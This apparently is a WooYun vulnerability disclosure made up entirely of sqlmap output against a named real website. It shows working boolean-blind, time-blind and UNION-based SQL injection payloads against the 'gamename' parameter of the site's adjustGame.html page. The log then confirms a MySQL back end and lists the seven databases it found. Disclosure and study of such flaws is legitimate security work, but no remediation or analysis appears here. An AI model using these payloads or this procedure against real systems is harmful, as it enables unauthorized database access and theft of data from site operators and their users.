WooYun.org

Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://www.yileyoo.com:80/ey_game_update/adjustGame.html?gamename=i
f(now()=sysdate(),sleep(0),0)/' AND 6677=6677 AND 'OEAh'='OEAh'XOR(if(now()=sysd
ate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"/
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: http://www.yileyoo.com:80/ey_game_update/adjustGame.html?gamename=i
f(now()=sysdate(),sleep(0),0)/' AND (SELECT * FROM (SELECT(SLEEP(5)))uzXN) AND '
Zxbd'='Zxbd'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(
0),0))OR"/
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: http://www.yileyoo.com:80/ey_game_update/adjustGame.html?gamename=i
f(now()=sysdate(),sleep(0),0)/' UNION ALL SELECT CONCAT(0x7170717071,0x697a6d795
275506b4753,0x717a6a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 'XOR(if(now()=sys
date(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"/
---
[13:20:52] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.12
[13:20:52] [INFO] fetching database names
[13:20:53] [WARNING] reflective value(s) found and filtering out
available databases [7]:
[*] information_schema
[*] stwk
[*] stwk_bj
[*] stwk_old
[*] stwk_simp
[*] stwk_sz
[*] zygx
[13:20:53] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\www.yileyoo.com'